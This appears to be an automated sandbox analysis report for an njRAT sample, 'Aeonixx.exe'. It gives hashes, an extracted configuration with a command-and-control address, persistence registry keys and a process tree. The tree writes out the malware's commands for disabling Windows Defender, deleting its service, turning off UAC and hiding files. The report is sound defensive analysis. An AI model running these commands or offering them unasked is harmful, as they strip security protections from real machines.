Analysis
-
max time kernel
150s -
max time network
155s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
19-07-2024 22:23
Behavioral task
behavioral1
Sample
Aeonixx.exe
Resource
win7-20240704-en
Behavioral task
behavioral2
Sample
Aeonixx.exe
Resource
win10v2004-20240709-en
General
-
Target
Aeonixx.exe
-
Size
907KB
-
MD5
554025c57d014fd5ed8ab159c96da159
-
SHA1
2295d41aae469f8252c872eab15f7b5fcd85593c
-
SHA256
7634e00a8aa848b561d2d18d78b1bd9fb2f02380418fb8b6b8b36ee4a201106f
-
SHA512
125dce70da69479503f6cd42a16518bfd25b993b58499059703ffd8761dfeea71421d5a212ccddd84663e2ec464eb60128c07154d3a4db07fabe31906225a11c
-
SSDEEP
12288:C4j4mGk/gKAsEu0Q07J4TpiQlO0Qcuvmxn0HOBJ7V:C2icgKAo0h0piQlO0QkxnRBJ5
Malware Config
Extracted
njrat
<- NjRAT 0.7d Horror Edition ->
CS2
85.108.113.75:1604
775de7e7e00d15df96207ab529453f70
-
reg_key
775de7e7e00d15df96207ab529453f70
-
splitter
Y262SUCZ4UJJ
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\775de7e7e00d15df96207ab529453f70.exe dllhost.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\775de7e7e00d15df96207ab529453f70.exe dllhost.exe -
Executes dropped EXE 4 IoCs
pid Process 344 AEONIX.EXE 2616 PAYLOAD.EXE 2916 S.EXE 1688 dllhost.exe -
Loads dropped DLL 6 IoCs
pid Process 1188 Aeonixx.exe 1188 Aeonixx.exe 344 AEONIX.EXE 344 AEONIX.EXE 2520 Process not Found 2616 PAYLOAD.EXE -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2212144002-1172735686-1556890956-1000\Software\Microsoft\Windows\CurrentVersion\Run\775de7e7e00d15df96207ab529453f70 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe\" .." dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\775de7e7e00d15df96207ab529453f70 = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\dllhost.exe\" .." dllhost.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 2308 sc.exe 2188 sc.exe 2548 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 1 IoCs
pid Process 2576 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2916 S.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE 2616 PAYLOAD.EXE -
Suspicious use of AdjustPrivilegeToken 35 IoCs
description pid Process Token: SeDebugPrivilege 2616 PAYLOAD.EXE Token: SeDebugPrivilege 1688 dllhost.exe Token: SeDebugPrivilege 1500 powershell.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe Token: 33 1688 dllhost.exe Token: SeIncBasePriorityPrivilege 1688 dllhost.exe -
Suspicious use of WriteProcessMemory 63 IoCs
description pid Process procid_target PID 1188 wrote to memory of 344 1188 Aeonixx.exe 30 PID 1188 wrote to memory of 344 1188 Aeonixx.exe 30 PID 1188 wrote to memory of 344 1188 Aeonixx.exe 30 PID 1188 wrote to memory of 344 1188 Aeonixx.exe 30 PID 344 wrote to memory of 2616 344 AEONIX.EXE 31 PID 344 wrote to memory of 2616 344 AEONIX.EXE 31 PID 344 wrote to memory of 2616 344 AEONIX.EXE 31 PID 344 wrote to memory of 2616 344 AEONIX.EXE 31 PID 344 wrote to memory of 2916 344 AEONIX.EXE 32 PID 344 wrote to memory of 2916 344 AEONIX.EXE 32 PID 344 wrote to memory of 2916 344 AEONIX.EXE 32 PID 344 wrote to memory of 2916 344 AEONIX.EXE 32 PID 2916 wrote to memory of 2624 2916 S.EXE 34 PID 2916 wrote to memory of 2624 2916 S.EXE 34 PID 2916 wrote to memory of 2624 2916 S.EXE 34 PID 2616 wrote to memory of 1688 2616 PAYLOAD.EXE 35 PID 2616 wrote to memory of 1688 2616 PAYLOAD.EXE 35 PID 2616 wrote to memory of 1688 2616 PAYLOAD.EXE 35 PID 2616 wrote to memory of 1688 2616 PAYLOAD.EXE 35 PID 1688 wrote to memory of 2472 1688 dllhost.exe 36 PID 1688 wrote to memory of 2472 1688 dllhost.exe 36 PID 1688 wrote to memory of 2472 1688 dllhost.exe 36 PID 1688 wrote to memory of 2472 1688 dllhost.exe 36 PID 1688 wrote to memory of 1492 1688 dllhost.exe 38 PID 1688 wrote to memory of 1492 1688 dllhost.exe 38 PID 1688 wrote to memory of 1492 1688 dllhost.exe 38 PID 1688 wrote to memory of 1492 1688 dllhost.exe 38 PID 1492 wrote to memory of 1500 1492 cmd.exe 40 PID 1492 wrote to memory of 1500 1492 cmd.exe 40 PID 1492 wrote to memory of 1500 1492 cmd.exe 40 PID 1492 wrote to memory of 1500 1492 cmd.exe 40 PID 1688 wrote to memory of 2948 1688 dllhost.exe 41 PID 1688 wrote to memory of 2948 1688 dllhost.exe 41 PID 1688 wrote to memory of 2948 1688 dllhost.exe 41 PID 1688 wrote to memory of 2948 1688 dllhost.exe 41 PID 2948 wrote to memory of 2308 2948 cmd.exe 43 PID 2948 wrote to memory of 2308 2948 cmd.exe 43 PID 2948 wrote to memory of 2308 2948 cmd.exe 43 PID 2948 wrote to memory of 2308 2948 cmd.exe 43 PID 1688 wrote to memory of 1056 1688 dllhost.exe 44 PID 1688 wrote to memory of 1056 1688 dllhost.exe 44 PID 1688 wrote to memory of 1056 1688 dllhost.exe 44 PID 1688 wrote to memory of 1056 1688 dllhost.exe 44 PID 1056 wrote to memory of 2188 1056 cmd.exe 46 PID 1056 wrote to memory of 2188 1056 cmd.exe 46 PID 1056 wrote to memory of 2188 1056 cmd.exe 46 PID 1056 wrote to memory of 2188 1056 cmd.exe 46 PID 1688 wrote to memory of 2784 1688 dllhost.exe 47 PID 1688 wrote to memory of 2784 1688 dllhost.exe 47 PID 1688 wrote to memory of 2784 1688 dllhost.exe 47 PID 1688 wrote to memory of 2784 1688 dllhost.exe 47 PID 2784 wrote to memory of 2548 2784 cmd.exe 49 PID 2784 wrote to memory of 2548 2784 cmd.exe 49 PID 2784 wrote to memory of 2548 2784 cmd.exe 49 PID 2784 wrote to memory of 2548 2784 cmd.exe 49 PID 1688 wrote to memory of 1356 1688 dllhost.exe 50 PID 1688 wrote to memory of 1356 1688 dllhost.exe 50 PID 1688 wrote to memory of 1356 1688 dllhost.exe 50 PID 1688 wrote to memory of 1356 1688 dllhost.exe 50 PID 1356 wrote to memory of 2576 1356 cmd.exe 52 PID 1356 wrote to memory of 2576 1356 cmd.exe 52 PID 1356 wrote to memory of 2576 1356 cmd.exe 52 PID 1356 wrote to memory of 2576 1356 cmd.exe 52 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2472 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Aeonixx.exe"C:\Users\Admin\AppData\Local\Temp\Aeonixx.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1188 -
C:\Users\Admin\AppData\Local\Temp\AEONIX.EXE"C:\Users\Admin\AppData\Local\Temp\AEONIX.EXE"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:344 -
C:\Users\Admin\AppData\Local\Temp\PAYLOAD.EXE"C:\Users\Admin\AppData\Local\Temp\PAYLOAD.EXE"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Users\Admin\AppData\Local\Temp\dllhost.exe"C:\Users\Admin\AppData\Local\Temp\dllhost.exe"4⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1688 -
C:\Windows\SysWOW64\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Temp\dllhost.exe"5⤵
- Views/modifies file attributes
PID:2472
-
-
C:\Windows\SysWOW64\cmd.execmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true5⤵
- Suspicious use of WriteProcessMemory
PID:1492 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc query windefend5⤵
- Suspicious use of WriteProcessMemory
PID:2948 -
C:\Windows\SysWOW64\sc.exesc query windefend6⤵
- Launches sc.exe
PID:2308
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc stop windefend5⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\SysWOW64\sc.exesc stop windefend6⤵
- Launches sc.exe
PID:2188
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc delete windefend5⤵
- Suspicious use of WriteProcessMemory
PID:2784 -
C:\Windows\SysWOW64\sc.exesc delete windefend6⤵
- Launches sc.exe
PID:2548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c reg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- Suspicious use of WriteProcessMemory
PID:1356 -
C:\Windows\SysWOW64\reg.exereg ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
- Modifies registry key
PID:2576
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\S.EXE"C:\Users\Admin\AppData\Local\Temp\S.EXE"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2916 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c pause4⤵PID:2624
-
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
849KB
MD50b7321cbbce655bb14c3737973936d8a
SHA13fbedbf411835e0d54593ae2fe938679f2f5a858
SHA256b13a4f5dc328fb50971d5579f8d32ca7af2b9cf5118999e033ff227242a04edd
SHA51282ee9dafd3948702da5eef1237270828257177f237115921b96d9d604901e0ce291d82562e20c3e0ad5473bd88615559fca2253a603c229f480b4fec746f4b34
-
Filesize
54KB
MD5dcc788ade743525d6922369a9b1cc1d9
SHA14c100d13f4115f64bbdcc47ffb4f60d50ea9edde
SHA2561a82a1b8db2e35e967a2f463292337e08717251b3e836bf1ffa20815b25037c9
SHA51267faa32ffb6a426f2626384629ac75083da881f549efe7b42c4d3ad915d93e1f2b07a10d952d9b7079b21964f66a8e5c8adb9a9e5fe59040b4dc5a5447c4fb79
-
Filesize
742KB
MD53dbda3d47ec35af319228ebe3677e743
SHA10c3033b7568875bb6041c8eaf7eefb065f2f138e
SHA2563d860b0b79377ea570b774977ac1d0976a5ce20c3a71ff67a9b91be84384fd9e
SHA512348f308e96400a4abf2f820ecfaff4c9bb3690b6a60cd1f0376913d0cf01af836a78c5df4af0d2fe95d0fa9186cbf6eefc1b2ef75c021b48572457ff273d9f74